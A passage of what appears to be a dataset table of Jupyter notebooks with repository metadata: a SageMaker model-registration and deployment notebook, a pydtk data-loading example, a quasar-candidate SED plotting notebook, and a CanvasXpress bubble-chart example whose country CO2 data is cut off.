hexsha (stringlengths 40-40) | size (int64 6-14.9M) | ext (stringclasses 1 value) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 6-260) | max_stars_repo_name (stringlengths 6-119) | max_stars_repo_head_hexsha (stringlengths 40-41) | max_stars_repo_licenses (list) | max_stars_count (int64 1-191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24 ⌀) | max_issues_repo_path (stringlengths 6-260) | max_issues_repo_name (stringlengths 6-119) | max_issues_repo_head_hexsha (stringlengths 40-41) | max_issues_repo_licenses (list) | max_issues_count (int64 1-67k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24 ⌀) | max_forks_repo_path (stringlengths 6-260) | max_forks_repo_name (stringlengths 6-119) | max_forks_repo_head_hexsha (stringlengths 40-41) | max_forks_repo_licenses (list) | max_forks_count (int64 1-105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24 ⌀) | avg_line_length (float64 2-1.04M) | max_line_length (int64 2-11.2M) | alphanum_fraction (float64 0-1) | cells (list) | cell_types (list) | cell_type_groups (list) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb289cc8fb59d26c11729e08f53e976389e77303 | 11,383 | ipynb | Jupyter Notebook | 00_quickstart/12_Register_Deploy_Model.ipynb | NRauschmayr/workshop | c890e38a5f4a339540697206ebdea479e66534e5 | [
"Apache-2.0"
] | null | null | null | 00_quickstart/12_Register_Deploy_Model.ipynb | NRauschmayr/workshop | c890e38a5f4a339540697206ebdea479e66534e5 | [
"Apache-2.0"
] | null | null | null | 00_quickstart/12_Register_Deploy_Model.ipynb | NRauschmayr/workshop | c890e38a5f4a339540697206ebdea479e66534e5 | [
"Apache-2.0"
] | null | null | null | 26.720657 | 254 | 0.571993 | [
[
[
"# Deploy the Model\n\nThe pipeline that was executed created a Model Package version within the specified Model Package Group. Of particular note, the registration of the model/creation of the Model Package was done so with approval status as `PendingManualApproval`.\n\nAs part of SageMaker Pipelines, data scientists can register the model with approved/pending manual approval as part of the CI/CD workflow.\n\nWe can also approve the model using the SageMaker Studio UI or programmatically as shown below.",
"_____no_output_____"
]
],
[
[
"from botocore.exceptions import ClientError\n\nimport os\nimport sagemaker\nimport logging\nimport boto3\nimport sagemaker\nimport pandas as pd\n\nsess = sagemaker.Session()\nbucket = sess.default_bucket()\nrole = sagemaker.get_execution_role()\nregion = boto3.Session().region_name\n\nsm = boto3.Session().client(service_name=\"sagemaker\", region_name=region)",
"_____no_output_____"
],
[
"%store -r pipeline_name",
"_____no_output_____"
],
[
"print(pipeline_name)",
"_____no_output_____"
],
[
"%%time\n\nimport time\nfrom pprint import pprint\n\nexecutions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)[\"PipelineExecutionSummaries\"]\npipeline_execution_status = executions_response[0][\"PipelineExecutionStatus\"]\nprint(pipeline_execution_status)\n\nwhile pipeline_execution_status == \"Executing\":\n try:\n executions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)[\"PipelineExecutionSummaries\"]\n pipeline_execution_status = executions_response[0][\"PipelineExecutionStatus\"]\n # print('Executions for our pipeline...')\n # print(pipeline_execution_status)\n except Exception as e:\n print(\"Please wait...\")\n time.sleep(30)\n\npprint(executions_response)",
"_____no_output_____"
]
],
[
[
"# List Pipeline Execution Steps\n",
"_____no_output_____"
]
],
[
[
"pipeline_execution_status = executions_response[0][\"PipelineExecutionStatus\"]\nprint(pipeline_execution_status)",
"_____no_output_____"
],
[
"pipeline_execution_arn = executions_response[0][\"PipelineExecutionArn\"]\nprint(pipeline_execution_arn)",
"_____no_output_____"
],
[
"from pprint import pprint\n\nsteps = sm.list_pipeline_execution_steps(PipelineExecutionArn=pipeline_execution_arn)\n\npprint(steps)",
"_____no_output_____"
]
],
[
[
"# View Registered Model",
"_____no_output_____"
]
],
[
[
"for execution_step in steps[\"PipelineExecutionSteps\"]:\n if execution_step[\"StepName\"] == \"RegisterModel\":\n model_package_arn = execution_step[\"Metadata\"][\"RegisterModel\"][\"Arn\"]\n break\nprint(model_package_arn)",
"_____no_output_____"
],
[
"model_package_update_response = sm.update_model_package(\n ModelPackageArn=model_package_arn,\n ModelApprovalStatus=\"Approved\", # Other options are Rejected and PendingManualApproval\n)",
"_____no_output_____"
]
],
[
[
"# View Created Model",
"_____no_output_____"
]
],
[
[
"for execution_step in steps[\"PipelineExecutionSteps\"]:\n if execution_step[\"StepName\"] == \"CreateModel\":\n model_arn = execution_step[\"Metadata\"][\"Model\"][\"Arn\"]\n break\nprint(model_arn)\n\nmodel_name = model_arn.split(\"/\")[-1]\nprint(model_name)",
"_____no_output_____"
]
],
[
[
"# Create Model Endpoint from Model Registry\nMore details here: https://docs.aws.amazon.com/sagemaker/latest/dg/model-registry-deploy.html\n",
"_____no_output_____"
]
],
[
[
"import time\n\ntimestamp = int(time.time())\n\nmodel_from_registry_name = \"bert-model-from-registry-{}\".format(timestamp)\nprint(\"Model from registry name : {}\".format(model_from_registry_name))\n\nmodel_registry_package_container = {\n \"ModelPackageName\": model_package_arn,\n}",
"_____no_output_____"
],
[
"from pprint import pprint\n\ncreate_model_from_registry_respose = sm.create_model(\n ModelName=model_from_registry_name, ExecutionRoleArn=role, PrimaryContainer=model_registry_package_container\n)\npprint(create_model_from_registry_respose)",
"_____no_output_____"
],
[
"model_from_registry_arn = create_model_from_registry_respose[\"ModelArn\"]\nmodel_from_registry_arn",
"_____no_output_____"
],
[
"endpoint_config_name = \"bert-model-from-registry-epc-{}\".format(timestamp)\nprint(endpoint_config_name)\n\ncreate_endpoint_config_response = sm.create_endpoint_config(\n EndpointConfigName=endpoint_config_name,\n ProductionVariants=[\n {\n \"InstanceType\": \"ml.m4.xlarge\", \n \"InitialVariantWeight\": 1,\n \"InitialInstanceCount\": 1,\n \"ModelName\": model_name,\n \"VariantName\": \"AllTraffic\",\n }\n ],\n)",
"_____no_output_____"
],
[
"pipeline_endpoint_name = \"bert-model-from-registry-ep-{}\".format(timestamp)\nprint(\"EndpointName={}\".format(pipeline_endpoint_name))\n\n# create_endpoint_response = sm.create_endpoint(\n# EndpointName=pipeline_endpoint_name, EndpointConfigName=endpoint_config_name\n# )\n# print(create_endpoint_response[\"EndpointArn\"])",
"_____no_output_____"
],
[
"# from IPython.core.display import display, HTML\n\n# display(\n# HTML(\n# '<b>Review <a target=\"blank\" href=\"https://console.aws.amazon.com/sagemaker/home?region={}#/endpoints/{}\">SageMaker REST Endpoint</a></b>'.format(\n# region, pipeline_endpoint_name\n# )\n# )\n# )",
"_____no_output_____"
],
[
"%store pipeline_endpoint_name",
"_____no_output_____"
]
],
[
[
"# _Wait Until the Endpoint is Deployed_",
"_____no_output_____"
]
],
[
[
"# %%time\n\n# waiter = sm.get_waiter(\"endpoint_in_service\")\n# waiter.wait(EndpointName=pipeline_endpoint_name)",
"_____no_output_____"
]
],
[
[
"# _Wait Until the Endpoint ^^ Above ^^ is Deployed_",
"_____no_output_____"
],
[
"# Predict the star_rating with Ad Hoc review_body Samples¶",
"_____no_output_____"
]
],
[
[
"# import json\n# from sagemaker.tensorflow.model import TensorFlowPredictor\n# from sagemaker.serializers import JSONLinesSerializer\n# from sagemaker.deserializers import JSONLinesDeserializer\n\n# predictor = TensorFlowPredictor(\n# endpoint_name=pipeline_endpoint_name,\n# sagemaker_session=sess,\n# model_name=\"saved_model\",\n# model_version=0,\n# accept_type=\"application/jsonlines\",\n# serializer=JSONLinesSerializer(),\n# deserializer=JSONLinesDeserializer(),\n# )",
"_____no_output_____"
],
[
"# inputs = [{\"features\": [\"This is great!\"]}, {\"features\": [\"This is bad.\"]}]\n\n# predicted_classes = predictor.predict(inputs)\n\n# for predicted_class in predicted_classes:\n# print(\"Predicted star_rating: {}\".format(predicted_class))",
"_____no_output_____"
]
],
[
[
"# Release Resources",
"_____no_output_____"
]
],
[
[
"# sm.delete_endpoint(\n# EndpointName=pipeline_endpoint_name\n# )",
"_____no_output_____"
],
[
"%%html\n\n<p><b>Shutting down your kernel for this notebook to release resources.</b></p>\n<button class=\"sm-command-button\" data-commandlinker-command=\"kernelmenu:shutdown\" style=\"display:none;\">Shutdown Kernel</button>\n\n<script>\ntry {\n els = document.getElementsByClassName(\"sm-command-button\");\n els[0].click();\n}\ncatch(err) {\n // NoOp\n} \n</script>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb28b5c5e4d0827f4cc4acb77ba48e3146835c24 | 6,677 | ipynb | Jupyter Notebook | examples/02_grab_data_based_on_metadata.ipynb | dataware-tools/pydtk | 1da61fb8ca90de6c39a371a9b2b65f4473932991 | [
"Apache-2.0"
] | 11 | 2020-10-09T01:29:18.000Z | 2022-01-21T13:21:40.000Z | examples/02_grab_data_based_on_metadata.ipynb | dataware-tools/pydtk | 1da61fb8ca90de6c39a371a9b2b65f4473932991 | [
"Apache-2.0"
] | 64 | 2020-10-20T04:55:22.000Z | 2022-01-24T15:52:32.000Z | examples/02_grab_data_based_on_metadata.ipynb | dataware-tools/pydtk | 1da61fb8ca90de6c39a371a9b2b65f4473932991 | [
"Apache-2.0"
] | 1 | 2021-07-30T04:52:38.000Z | 2021-07-30T04:52:38.000Z | 23.510563 | 116 | 0.473117 | [
[
[
"# Example 2: Grab data based on metadata\n\nIn this example, we will learn how to grab the actual data based on metadata.",
"_____no_output_____"
],
[
"## Filter metadata\n\nJust like how we have done in the previous example, let's search for files containing `camera/front-center`.",
"_____no_output_____"
]
],
[
[
"import os\nfrom pydtk.db import DBHandler\n\ndb_handler = DBHandler(\n db_class='meta',\n db_host='./example_db',\n base_dir_path='../test'\n)\ndb_handler.read(pql='\"contents.camera/front-center\" == exists(True)')\ndb_handler.content_df\n",
"_____no_output_____"
]
],
[
[
"Note that metadata here is associated to each file containing the actual data. \nThus, if a file has more than one contents (e.g., A rosbag file can store multiple signals), \nthen those which are other than `camera/front-center` are also retrieved.\n",
"_____no_output_____"
],
[
"## Iterate metadata\n\nYou can get metadata one-by-one as `DBHandler` works as an iterator. \nTo get a sample, just use `next()` method. \nMetadata will be returned as a dict.",
"_____no_output_____"
]
],
[
[
"sample = next(db_handler)\nsample",
"_____no_output_____"
]
],
[
[
"## Grab data\n\nBased on the metadata, we can grab the actual data as a numpy array from the corresponding file. \n`BaseFileReader` automatically chooses an appropriate model to load the file based on the given metadata. \nThus, you can simple call `read` function to grab data as follows.",
"_____no_output_____"
]
],
[
[
"from pydtk.io import BaseFileReader, NoModelMatchedError\n\nreader = BaseFileReader()\n\ntry:\n timestamps, data, columns = reader.read(sample)\n print('# of frames: {}'.format(len(timestamps)))\nexcept NoModelMatchedError as e:\n print(str(e))",
"WARNING:root:Failed to load models in autoware\nWARNING:root:Failed to load models in movie.py\nWARNING:root:Failed to load models in rosbag.py\n"
]
],
[
[
"Let's check the ndarray.",
"_____no_output_____"
]
],
[
[
"timestamps?",
"_____no_output_____"
],
[
"data?",
"_____no_output_____"
],
[
"columns?",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb28cf23e9dbc649e046f6857af7d13fa2322069 | 64,086 | ipynb | Jupyter Notebook | highz_clustering/clustering/Data_Sets/Candidate_SED.ipynb | JDTimlin/QSO_Clustering | 6f4b9e8dcf4d972044c24333b5d57cab679d2bd6 | [
"MIT"
] | 1 | 2018-08-07T19:41:24.000Z | 2018-08-07T19:41:24.000Z | highz_clustering/clustering/Data_Sets/Candidate_SED.ipynb | JDTimlin/QSO_Clustering | 6f4b9e8dcf4d972044c24333b5d57cab679d2bd6 | [
"MIT"
] | null | null | null | highz_clustering/clustering/Data_Sets/Candidate_SED.ipynb | JDTimlin/QSO_Clustering | 6f4b9e8dcf4d972044c24333b5d57cab679d2bd6 | [
"MIT"
] | null | null | null | 233.04 | 15,472 | 0.916612 | [
[
[
"%matplotlib inline\nimport numpy as np\nfrom astropy.io import fits as pf\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"#open the candidate file\n\ndfile = 'QSO_Candidates_Final_Clustering_Set.fits'\n\ndata = pf.open(dfile)[1].data\n\n",
"_____no_output_____"
],
[
"#Separate the 7 colors into arrays\n\nu = data['ug'] + data ['gr'] + data['ri'] + data['imag']\ng = data ['gr'] + data['ri'] + data['imag']\nr = data['ri'] + data['imag']\ni = data['imag']\nz = data['imag'] - data['iz']\ns1= data['imag'] - (data['zs1'] + data['iz'])\ns2= data['imag'] - (data['s1s2'] + data['zs1'] + data['iz'])\n\nfu = data['PSFFLUX'][:,0]\nfg = data['PSFFLUX'][:,1]\nfr = data['PSFFLUX'][:,2]\nfi = data['PSFFLUX'][:,3]\nfz = data['PSFFLUX'][:,4]\nfs1= data['CH'][:,0]\nfs2= data['CH'][:,1]\n\nprint len(fu)",
"9076\n"
],
[
"u = u[:, np.newaxis]\ng = g[:, np.newaxis]\nr = r[:, np.newaxis]\ni = i[:, np.newaxis]\nz = z[:, np.newaxis]\ns1= s1[:, np.newaxis]\ns2= s2[:, np.newaxis]\n\nfu = fu[:, np.newaxis]\nfg = fg[:, np.newaxis]\nfr = fr[:, np.newaxis]\nfi = fi[:, np.newaxis]\nfz = fz[:, np.newaxis]\nfs1= fs1[:, np.newaxis]\nfs2= fs2[:, np.newaxis]",
"_____no_output_____"
],
[
"colarray = np.hstack([u,g,r,i,z,s1,s2])\nflxarray = np.hstack([fu,fg,fr,fi,fz,fs1,fs2])",
"_____no_output_____"
],
[
"bandpass = [3543, 4770, 6231, 7625, 9134, 36000, 45000]\n",
"_____no_output_____"
],
[
"plt.figure(1)\nfor i in range(1000):\n plt.scatter(bandpass, colarray[i],s=1)\n\nplt.xscale('log')\nplt.show()\n\n",
"_____no_output_____"
],
[
"bdx = (data['Vis_insp'] == 0)\n\ngalaxies = colarray[bdx]\ngalflux = flxarray[bdx]",
"_____no_output_____"
],
[
"plt.figure(2)\nfor i in range(len(galaxies)):\n plt.scatter(bandpass, galaxies[i],s=1)\n\nplt.xscale('log')\nplt.show()\n",
"_____no_output_____"
],
[
"plt.figure(3)\nfor i in range(1000):\n plt.scatter(bandpass, flxarray[i],s=1)\n\nplt.xscale('log')\nplt.yscale('log')\nplt.show()",
"_____no_output_____"
],
[
"plt.figure(4)\nfor i in range(len(galflux)):\n plt.scatter(bandpass, galflux[i],s=1)\n\nplt.xscale('log')\nplt.yscale('log')\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb28fc30e5a20c165e7bdb093233a94d7ef2a2a5 | 29,278 | ipynb | Jupyter Notebook | tutorials/notebook/cx_site_chart_examples/bubble_4.ipynb | docinfosci/canvasxpress-python | 532a981b04d0f50bbde1852c695117a6220f4589 | [
"MIT"
] | 4 | 2021-03-18T17:23:40.000Z | 2022-02-01T19:07:01.000Z | tutorials/notebook/cx_site_chart_examples/bubble_4.ipynb | docinfosci/canvasxpress-python | 532a981b04d0f50bbde1852c695117a6220f4589 | [
"MIT"
] | 8 | 2021-04-30T20:46:57.000Z | 2022-03-10T07:25:31.000Z | tutorials/notebook/cx_site_chart_examples/bubble_4.ipynb | docinfosci/canvasxpress-python | 532a981b04d0f50bbde1852c695117a6220f4589 | [
"MIT"
] | 1 | 2022-02-03T00:35:14.000Z | 2022-02-03T00:35:14.000Z | 29,278 | 29,278 | 0.246055 | [
[
[
"# Example: CanvasXpress bubble Chart No. 4\n\nThis example page demonstrates how to, using the Python package, create a chart that matches the CanvasXpress online example located at:\n\nhttps://www.canvasxpress.org/examples/bubble-4.html\n\nThis example is generated using the reproducible JSON obtained from the above page and the `canvasxpress.util.generator.generate_canvasxpress_code_from_json_file()` function.\n\nEverything required for the chart to render is included in the code below. Simply run the code block.",
"_____no_output_____"
]
],
[
[
"from canvasxpress.canvas import CanvasXpress \nfrom canvasxpress.js.collection import CXEvents \nfrom canvasxpress.render.jupyter import CXNoteBook \n\ncx = CanvasXpress(\n render_to=\"bubble4\",\n data={\n \"y\": {\n \"vars\": [\n \"CO2\"\n ],\n \"smps\": [\n \"AFG\",\n \"ALB\",\n \"DZA\",\n \"AND\",\n \"AGO\",\n \"AIA\",\n \"ATG\",\n \"ARG\",\n \"ARM\",\n \"ABW\",\n \"AUS\",\n \"AUT\",\n \"AZE\",\n \"BHS\",\n \"BHR\",\n \"BGD\",\n \"BRB\",\n \"BLR\",\n \"BEL\",\n \"BLZ\",\n \"BEN\",\n \"BMU\",\n \"BTN\",\n \"BOL\",\n \"BIH\",\n \"BWA\",\n \"BRA\",\n \"VGB\",\n \"BRN\",\n \"BGR\",\n \"BFA\",\n \"BDI\",\n \"KHM\",\n \"CMR\",\n \"CAN\",\n \"CPV\",\n \"CAF\",\n \"TCD\",\n \"CHL\",\n \"CHN\",\n \"COL\",\n \"COM\",\n \"COG\",\n \"COK\",\n \"CRI\",\n \"HRV\",\n \"CUB\",\n \"CYP\",\n \"CZE\",\n \"COD\",\n \"DNK\",\n \"DJI\",\n \"DOM\",\n \"ECU\",\n \"EGY\",\n \"SLV\",\n \"GNQ\",\n \"ERI\",\n \"EST\",\n \"ETH\",\n \"FJI\",\n \"FIN\",\n \"FRA\",\n \"PYF\",\n \"GAB\",\n \"GMB\",\n \"GEO\",\n \"DEU\",\n \"GHA\",\n \"GRC\",\n \"GRL\",\n \"GRD\",\n \"GTM\",\n \"GIN\",\n \"GNB\",\n \"GUY\",\n \"HTI\",\n \"HND\",\n \"HKG\",\n \"HUN\",\n \"ISL\",\n \"IND\",\n \"IDN\",\n \"IRN\",\n \"IRQ\",\n \"IRL\",\n \"ISR\",\n \"ITA\",\n \"JAM\",\n \"JPN\",\n \"JOR\",\n \"KAZ\",\n \"KEN\",\n \"KIR\",\n \"KWT\",\n \"KGZ\",\n \"LAO\",\n \"LVA\",\n \"LBN\",\n \"LSO\",\n \"LBR\",\n \"LBY\",\n \"LIE\",\n \"LTU\",\n \"LUX\",\n \"MAC\",\n \"MDG\",\n \"MWI\",\n \"MYS\",\n \"MDV\",\n \"MLI\",\n \"MLT\",\n \"MHL\",\n \"MRT\",\n \"MUS\",\n \"MEX\",\n \"MDA\",\n \"MNG\",\n \"MNE\",\n \"MAR\",\n \"MOZ\",\n \"MMR\",\n \"NAM\",\n \"NRU\",\n \"NPL\",\n \"NLD\",\n \"NCL\",\n \"NZL\",\n \"NIC\",\n \"NER\",\n \"NGA\",\n \"NIU\",\n \"PRK\",\n \"MKD\",\n \"NOR\",\n \"OMN\",\n \"PAK\",\n \"PAN\",\n \"PNG\",\n \"PRY\",\n \"PER\",\n \"PHL\",\n \"POL\",\n \"PRT\",\n \"QAT\",\n \"ROU\",\n \"RUS\",\n \"RWA\",\n \"SHN\",\n \"KNA\",\n \"LCA\",\n \"SPM\",\n \"VCT\",\n \"WSM\",\n \"STP\",\n \"SAU\",\n \"SRB\",\n \"SYC\",\n \"SLE\",\n \"SGP\",\n \"SVK\",\n \"SVN\",\n \"SLB\",\n \"SOM\",\n \"KOR\",\n \"SSD\",\n \"ESP\",\n \"LKA\",\n \"SDN\",\n \"SUR\",\n \"SWE\",\n \"CHE\",\n \"SYR\",\n \"TWN\",\n \"TJK\",\n \"TZA\",\n \"THA\",\n \"TLS\",\n \"TGO\",\n \"TON\",\n \"TTO\",\n \"TUN\",\n \"TUR\",\n \"TKM\",\n \"TUV\",\n \"UGA\",\n \"UKR\",\n \"ARE\",\n \"GBR\",\n \"USA\",\n \"URY\",\n \"UZB\",\n \"VUT\",\n \"VEN\",\n \"VNM\",\n \"YEM\",\n \"ZMB\",\n \"ZWE\"\n ],\n \"data\": [\n [\n 10.452666,\n 5.402999,\n 164.309295,\n 0.46421,\n 37.678605,\n 0.147145,\n 0.505574,\n 185.029897,\n 6.296603,\n 0.943234,\n 415.953947,\n 66.719678,\n 37.488394,\n 2.03001,\n 31.594487,\n 85.718805,\n 1.207134,\n 61.871676,\n 100.207836,\n 0.612205,\n 7.759753,\n 0.648945,\n 1.662172,\n 22.345503,\n 22.086102,\n 6.815418,\n 466.649304,\n 0.173555,\n 9.560399,\n 43.551599,\n 4.140342,\n 0.568028,\n 15.479031,\n 7.566796,\n 586.504635,\n 0.609509,\n 0.300478,\n 1.008035,\n 85.829114,\n 9956.568523,\n 92.228209,\n 0.245927,\n 3.518309,\n 0.072706,\n 8.249118,\n 17.718646,\n 26.084446,\n 7.332762,\n 104.411211,\n 2.231343,\n 34.65143,\n 0.389975,\n 25.305221,\n 41.817989,\n 251.460913,\n 6.018265,\n 5.90578,\n 0.708769,\n 17.710953,\n 16.184949,\n 2.123769,\n 45.849349,\n 331.725446,\n 0.780633,\n 4.803117,\n 0.56324,\n 9.862173,\n 755.362342,\n 14.479998,\n 71.797869,\n 0.511728,\n 0.278597,\n 19.411335,\n 3.032114,\n 0.308612,\n 2.342628,\n 3.366964,\n 10.470701,\n 42.505723,\n 49.628491,\n 3.674529,\n 2591.323739,\n 576.58439,\n 755.402186,\n 211.270294,\n 38.803394,\n 
62.212641,\n 348.085029,\n 8.009662,\n 1135.688,\n 24.923803,\n 319.647412,\n 17.136703,\n 0.068879,\n 104.217567,\n 10.16888,\n 32.26245,\n 7.859287,\n 27.565431,\n 2.425558,\n 1.27446,\n 45.205986,\n 0.14375,\n 13.669492,\n 9.56852,\n 2.216456,\n 4.187806,\n 1.470252,\n 249.144498,\n 1.565092,\n 3.273276,\n 1.531581,\n 0.153065,\n 3.934804,\n 4.901611,\n 451.080829,\n 5.877784,\n 64.508256,\n 2.123147,\n 65.367444,\n 8.383478,\n 26.095603,\n 4.154302,\n 0.049746,\n 13.410432,\n 160.170147,\n 8.20904,\n 35.080341,\n 5.377193,\n 2.093847,\n 136.078346,\n 0.007653,\n 38.162935,\n 6.980909,\n 43.817657,\n 71.029916,\n 247.425382,\n 12.096333,\n 6.786146,\n 8.103032,\n 54.210259,\n 138.924391,\n 337.705742,\n 51.482481,\n 109.24468,\n 76.951219,\n 1691.360426,\n 1.080098,\n 0.011319,\n 0.249014,\n 0.362202,\n 0.079232,\n 0.264106,\n 0.267864,\n 0.126126,\n 576.757836,\n 46.0531,\n 0.60536,\n 0.987559,\n 38.28806,\n 36.087837,\n 14.487844,\n 0.298477,\n 0.658329,\n 634.934068,\n 1.539884,\n 269.654254,\n 22.973233,\n 22.372399,\n 2.551817,\n 41.766183,\n 36.895485,\n 25.877689,\n 273.104667,\n 7.473265,\n 11.501889,\n 292.452995,\n 0.520422,\n 3.167303,\n 0.164545,\n 37.865571,\n 30.357093,\n 419.194747,\n 78.034724,\n 0.01148,\n 5.384767,\n 231.694165,\n 188.541366,\n 380.138559,\n 5424.881502,\n 6.251839,\n 113.93837,\n 0.145412,\n 129.596274,\n 211.774129,\n 9.945288,\n 6.930094,\n 11.340575\n ]\n ]\n },\n \"x\": {\n \"Country\": [\n \"Afghanistan\",\n \"Albania\",\n \"Algeria\",\n \"Andorra\",\n \"Angola\",\n \"Anguilla\",\n \"Antigua and Barbuda\",\n \"Argentina\",\n \"Armenia\",\n \"Aruba\",\n \"Australia\",\n \"Austria\",\n \"Azerbaijan\",\n \"Bahamas\",\n \"Bahrain\",\n \"Bangladesh\",\n \"Barbados\",\n \"Belarus\",\n \"Belgium\",\n \"Belize\",\n \"Benin\",\n \"Bermuda\",\n \"Bhutan\",\n \"Bolivia\",\n \"Bosnia and Herzegovina\",\n \"Botswana\",\n \"Brazil\",\n \"British Virgin Islands\",\n \"Brunei\",\n \"Bulgaria\",\n \"Burkina Faso\",\n \"Burundi\",\n \"Cambodia\",\n \"Cameroon\",\n \"Canada\",\n \"Cape Verde\",\n \"Central African Republic\",\n \"Chad\",\n \"Chile\",\n \"China\",\n \"Colombia\",\n \"Comoros\",\n \"Congo\",\n \"Cook Islands\",\n \"Costa Rica\",\n \"Croatia\",\n \"Cuba\",\n \"Cyprus\",\n \"Czechia\",\n \"Democratic Republic of Congo\",\n \"Denmark\",\n \"Djibouti\",\n \"Dominican Republic\",\n \"Ecuador\",\n \"Egypt\",\n \"El Salvador\",\n \"Equatorial Guinea\",\n \"Eritrea\",\n \"Estonia\",\n \"Ethiopia\",\n \"Fiji\",\n \"Finland\",\n \"France\",\n \"French Polynesia\",\n \"Gabon\",\n \"Gambia\",\n \"Georgia\",\n \"Germany\",\n \"Ghana\",\n \"Greece\",\n \"Greenland\",\n \"Grenada\",\n \"Guatemala\",\n \"Guinea\",\n \"Guinea-Bissau\",\n \"Guyana\",\n \"Haiti\",\n \"Honduras\",\n \"Hong Kong\",\n \"Hungary\",\n \"Iceland\",\n \"India\",\n \"Indonesia\",\n \"Iran\",\n \"Iraq\",\n \"Ireland\",\n \"Israel\",\n \"Italy\",\n \"Jamaica\",\n \"Japan\",\n \"Jordan\",\n \"Kazakhstan\",\n \"Kenya\",\n \"Kiribati\",\n \"Kuwait\",\n \"Kyrgyzstan\",\n \"Laos\",\n \"Latvia\",\n \"Lebanon\",\n \"Lesotho\",\n \"Liberia\",\n \"Libya\",\n \"Liechtenstein\",\n \"Lithuania\",\n \"Luxembourg\",\n \"Macao\",\n \"Madagascar\",\n \"Malawi\",\n \"Malaysia\",\n \"Maldives\",\n \"Mali\",\n \"Malta\",\n \"Marshall Islands\",\n \"Mauritania\",\n \"Mauritius\",\n \"Mexico\",\n \"Moldova\",\n \"Mongolia\",\n \"Montenegro\",\n \"Morocco\",\n \"Mozambique\",\n \"Myanmar\",\n \"Namibia\",\n \"Nauru\",\n \"Nepal\",\n \"Netherlands\",\n \"New Caledonia\",\n \"New Zealand\",\n \"Nicaragua\",\n 
\"Niger\",\n \"Nigeria\",\n \"Niue\",\n \"North Korea\",\n \"North Macedonia\",\n \"Norway\",\n \"Oman\",\n \"Pakistan\",\n \"Panama\",\n \"Papua New Guinea\",\n \"Paraguay\",\n \"Peru\",\n \"Philippines\",\n \"Poland\",\n \"Portugal\",\n \"Qatar\",\n \"Romania\",\n \"Russia\",\n \"Rwanda\",\n \"Saint Helena\",\n \"Saint Kitts and Nevis\",\n \"Saint Lucia\",\n \"Saint Pierre and Miquelon\",\n \"Saint Vincent and the Grenadines\",\n \"Samoa\",\n \"Sao Tome and Principe\",\n \"Saudi Arabia\",\n \"Serbia\",\n \"Seychelles\",\n \"Sierra Leone\",\n \"Singapore\",\n \"Slovakia\",\n \"Slovenia\",\n \"Solomon Islands\",\n \"Somalia\",\n \"South Korea\",\n \"South Sudan\",\n \"Spain\",\n \"Sri Lanka\",\n \"Sudan\",\n \"Suriname\",\n \"Sweden\",\n \"Switzerland\",\n \"Syria\",\n \"Taiwan\",\n \"Tajikistan\",\n \"Tanzania\",\n \"Thailand\",\n \"Timor\",\n \"Togo\",\n \"Tonga\",\n \"Trinidad and Tobago\",\n \"Tunisia\",\n \"Turkey\",\n \"Turkmenistan\",\n \"Tuvalu\",\n \"Uganda\",\n \"Ukraine\",\n \"United Arab Emirates\",\n \"United Kingdom\",\n \"United States\",\n \"Uruguay\",\n \"Uzbekistan\",\n \"Vanuatu\",\n \"Venezuela\",\n \"Vietnam\",\n \"Yemen\",\n \"Zambia\",\n \"Zimbabwe\"\n ],\n \"Continent\": [\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"Africa\",\n \"North America\",\n \"North America\",\n \"South America\",\n \"Asia\",\n \"North America\",\n \"Oceania\",\n \"Europe\",\n \"Europe\",\n \"North America\",\n \"Asia\",\n \"Asia\",\n \"North America\",\n \"Europe\",\n \"Europe\",\n \"North America\",\n \"Africa\",\n \"North America\",\n \"Asia\",\n \"South America\",\n \"Europe\",\n \"Africa\",\n \"South America\",\n \"North America\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Africa\",\n \"North America\",\n \"Africa\",\n \"Africa\",\n \"Africa\",\n \"South America\",\n \"Asia\",\n \"South America\",\n \"Africa\",\n \"Africa\",\n \"Oceania\",\n \"Central America\",\n \"Europe\",\n \"North America\",\n \"Europe\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"Africa\",\n \"North America\",\n \"South America\",\n \"Africa\",\n \"Central America\",\n \"Africa\",\n \"Africa\",\n \"Europe\",\n \"Africa\",\n \"Oceania\",\n \"Europe\",\n \"Europe\",\n \"Oceania\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"North America\",\n \"North America\",\n \"Central America\",\n \"Africa\",\n \"Africa\",\n \"South America\",\n \"North America\",\n \"Central America\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Europe\",\n \"Asia\",\n \"Europe\",\n \"North America\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n 